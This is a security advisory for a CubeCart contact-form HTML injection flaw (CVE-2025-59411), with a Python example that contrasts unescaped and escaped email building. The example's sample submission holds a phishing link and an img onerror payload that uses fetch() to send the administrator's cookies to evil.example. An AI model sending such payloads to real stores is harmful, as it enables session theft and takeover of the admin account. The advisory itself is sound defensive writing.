PT-2025-38743 · Cubecart · Cubecart

Published 2025-09-22 · Updated 2025-09-22 · CVE-2025-59411
CVSS v3.1 5.4 Medium
Vector AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Name of the Vulnerable Software and Affected Versions: CubeCart versions prior to 6.5.11
Description: CubeCart is an ecommerce software solution. The contact form's Enquiry field accepts raw HTML, which is embedded unescaped in the notification email sent to the store administrator. Submitting HTML through the Enquiry field therefore results in the administrator receiving an email that contains that HTML as markup rather than as text. This indicates a lack of proper escaping or sanitization of user input before it is output in the email, potentially leading to Cross-Site Scripting or HTML injection within email clients or the administrative user interface. The Enquiry field is the vulnerable parameter. As the CVSS vector indicates, the sender needs no account (PR:N) and the administrator only has to open the message (UI:R); what actually executes depends on how much of the injected HTML and script the recipient's mail client is willing to render.
Recommendations: Update to version 6.5.11 or later. To confirm whether an installation is affected, submit a harmless tag such as <b>test</b> through the contact form's Enquiry field: on a vulnerable version the administrator's notification email renders it as bold text instead of showing the literal tag.
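The pattern behind this advisory, shown as an added example that is not CubeCart's own code: a notification builder that interpolates the Enquiry field verbatim into an HTML email, beside a version that escapes every user-controlled value before it enters the HTML part and ships the raw text only in the text/plain alternative. The field names, templates, addresses and the sample submission are all assumptions constructed for illustration.

```python
"""Added example (not CubeCart code): unescaped contact-form input becoming
markup in the administrator's HTML notification email, and the fix.
Field names, templates, addresses and the sample submission are assumptions."""
import html
import re
from email.message import EmailMessage

# Constructed sample: a contact-form submission whose enquiry is HTML, not text.
SAMPLE_SUBMISSION = {
    "name": "Alice",
    "email": "alice@example.com",
    "enquiry": (
        '<a href="https://evil.example/login">Reset your admin password</a>'
        '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'
    ),
}

HTML_TEMPLATE = (
    "<p>New enquiry from {name} ({email}):</p>\n"
    "<p>{enquiry}</p>"
)


def build_html_vulnerable(submission):
    """Interpolates user input verbatim: the enquiry becomes live markup."""
    return HTML_TEMPLATE.format(**submission)


def build_html_fixed(submission):
    """Escapes every user-controlled value before it enters the HTML body.
    Newlines are turned into <br> only after escaping, so line breaks in a
    legitimate enquiry still render but no user-supplied tag survives."""
    safe = {key: html.escape(value, quote=True) for key, value in submission.items()}
    safe["enquiry"] = safe["enquiry"].replace("\n", "<br>\n")
    return HTML_TEMPLATE.format(**safe)


def build_notification_fixed(submission, admin_addr="admin@shop.example"):
    """Builds a multipart/alternative notification: the text/plain part carries
    the enquiry verbatim (mail clients never render text/plain as markup) and
    the text/html part carries the escaped version. Addresses are assumptions."""
    msg = EmailMessage()
    msg["Subject"] = "Contact form enquiry from " + submission["name"]
    msg["To"] = admin_addr
    msg["From"] = "noreply@shop.example"
    msg.set_content(
        "New enquiry from {name} ({email}):\n\n{enquiry}\n".format(**submission)
    )
    msg.add_alternative(build_html_fixed(submission), subtype="html")
    return msg


TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def tag_names(body):
    """Lists the element names of every tag in an HTML body, in document order,
    so the two builders can be compared on what the mail client would see."""
    return [m.group(1).lower() for m in TAG_RE.finditer(body)]


def contains_markup(text):
    """Heuristic screen for form input that contains tags, useful for logging or
    alerting on suspicious submissions. It is not a substitute for escaping:
    a stray '<' in prose can trip it, and encoding tricks can slip past it."""
    return TAG_RE.search(text) is not None


if __name__ == "__main__":
    print("vulnerable tags:", tag_names(build_html_vulnerable(SAMPLE_SUBMISSION)))
    print("fixed tags:     ", tag_names(build_html_fixed(SAMPLE_SUBMISSION)))
    print(build_notification_fixed(SAMPLE_SUBMISSION).as_string())
```

Escaping at the point where the value is written into HTML is the fix; `contains_markup` is only a screen for spotting submissions worth looking at in the form-handler logs, since a store that legitimately receives angle brackets in enquiries cannot simply reject them.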

XSS

Weakness Enumeration

Related Identifiers

CVE-2025-59411
GHSA-5HG3-M3Q3-V2P4

Affected Products

Cubecart